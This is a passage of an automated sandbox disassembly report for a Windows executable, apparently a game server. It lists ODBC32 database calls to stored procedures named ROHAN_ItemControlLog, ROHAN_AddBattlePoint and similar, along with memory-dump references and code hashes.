                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438728
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00438760
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438798
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004387D0
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438808
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_ItemControlLog] (?,?,?,?)}, xrefs: 004386DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_ItemControlLog] (?,?,?,?)}
                                                                                      • API String ID: 0-2043687416
                                                                                      • Opcode ID: 5f9d4a61da287589500595c26c8665d90c37e947048119e2d6406218a44b86fd
                                                                                      • Instruction ID: df0c20a9ae21da0215c7b70761ebdb298ae0eada5d50c09b03538091328de8f0
                                                                                      • Opcode Fuzzy Hash: 5f9d4a61da287589500595c26c8665d90c37e947048119e2d6406218a44b86fd
                                                                                      • Instruction Fuzzy Hash: 5B3110B0681214FBEB249B84CC52FA97334EF80B18F10458AF7186E2C5D5B57E80CB69
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_MOVECharResult] (?,?,?,?) },000000FD), ref: 00439213
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00439255
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043928A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004392C2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004392FA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00439332
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_MOVECharResult] (?,?,?,?) }, xrefs: 0043920A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_MOVECharResult] (?,?,?,?) }
                                                                                      • API String ID: 0-1039874972
                                                                                      • Opcode ID: 620834b614a1a832324f1f35e9428282fbcdc03d0227f826b425a432394cf107
                                                                                      • Instruction ID: 5af1ea8226363edc5d5a3810f3c2ca9a2ccbacfe4b5203ea68b245bba493d318
                                                                                      • Opcode Fuzzy Hash: 620834b614a1a832324f1f35e9428282fbcdc03d0227f826b425a432394cf107
                                                                                      • Instruction Fuzzy Hash: 4C3108746802147BFB249B94CD52FAA7335DF84B18F20828AF71C7E2C6D5B57D818B68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_AddBattlePoint] (?,?,?,?) },000000FD), ref: 0043941D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043945F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00439494
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004394CC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00439504
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043953C
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_AddBattlePoint] (?,?,?,?) }, xrefs: 00439414
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_AddBattlePoint] (?,?,?,?) }
                                                                                      • API String ID: 0-3764794868
                                                                                      • Opcode ID: c6cf66e4ee98e5a194e402ed2f3da652beeea4bd01deb28bafd66eb7bd51d171
                                                                                      • Instruction ID: 9883638f84cb87be5bb0aeddb406c71920d48a673a323456e0288d13d6842d7d
                                                                                      • Opcode Fuzzy Hash: c6cf66e4ee98e5a194e402ed2f3da652beeea4bd01deb28bafd66eb7bd51d171
                                                                                      • Instruction Fuzzy Hash: EF3110B07442147FEB648B84CC52FAA7334DFC1B18F20828AF7556E2C5D5F179808B6A
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_UpdTMileage] (?,?,?,?)},000000FD), ref: 004385A9
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004385EB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00438620
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438658
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438690
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004386C8
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_UpdTMileage] (?,?,?,?)}, xrefs: 004385A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_UpdTMileage] (?,?,?,?)}
                                                                                      • API String ID: 0-1301631577
                                                                                      • Opcode ID: d2c61a4a31b376ed005a2e919a7e1d8bbf2a12cef974e62dda4b041bf840a9cb
                                                                                      • Instruction ID: 423dae9c8e3353a9d182ea9198d07511e73342afa402863d44ee4c609443c19d
                                                                                      • Opcode Fuzzy Hash: d2c61a4a31b376ed005a2e919a7e1d8bbf2a12cef974e62dda4b041bf840a9cb
                                                                                      • Instruction Fuzzy Hash: 0731F6B1654218BBEB209B94CC52FAD7374EB54B24F10828BF7147E2C5D5B5BD408F68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetItemEventPaging] (?,?,?,?)},000000FD), ref: 00439B14
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00439B56
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00439B8B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00439BC3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00439BFB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00439C33
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetItemEventPaging] (?,?,?,?)}, xrefs: 00439B0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetItemEventPaging] (?,?,?,?)}
                                                                                      • API String ID: 0-2971793806
                                                                                      • Opcode ID: ea8b13a676a525286c7f121b5fe9423c82de29cf764a0358432b18f0c60ffe40
                                                                                      • Instruction ID: ea4d347abc3887468686155e4bb84ab6ea7952c04036d7460d8ff90f2a0e2f5d
                                                                                      • Opcode Fuzzy Hash: ea8b13a676a525286c7f121b5fe9423c82de29cf764a0358432b18f0c60ffe40
                                                                                      • Instruction Fuzzy Hash: 71311EB0A442547BEB24EB84CC52FAD7735FB80B54F20428AF6156E2C1E6F57980CB68
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 00445A4B
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 00445A7B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 00445AAB
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 00445ADB
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00445B0B
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?), ref: 00445B3B
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00445B6B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00445B9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: abab80ec95ddc621403f3d73f17da5ea96820dd490c36d48c366a0bc6424cb7d
                                                                                      • Instruction ID: e47ae982dd7e584f15360720f4e4cb54473e12fc421a4e5f748217fb785f93b8
                                                                                      • Opcode Fuzzy Hash: abab80ec95ddc621403f3d73f17da5ea96820dd490c36d48c366a0bc6424cb7d
                                                                                      • Instruction Fuzzy Hash: 1641DAB1A02118ABFB24DB09CD61FAA7375FB44718F1083C9F6196B3C5D671AE908F54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 00446B8B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 00446BBB
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00446BEB
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 00446C1B
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,00000001,?), ref: 00446C4B
                                                                                      • #4.ODBC32(?,00000000,00000007,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F1,?), ref: 00446C7B
                                                                                      • #4.ODBC32(?,00000000,00000007,?,00000000,00000000,?,00000000,00000007,?,00000000,00000000,?,00000000,000000FA,?), ref: 00446CAB
                                                                                      • #4.ODBC32(?,00000000,00000007,?,00000000,00000000,?,00000000,00000007,?,00000000,00000000,?,00000000,00000007,?), ref: 00446CDB
                                                                                      Memory Dump Source
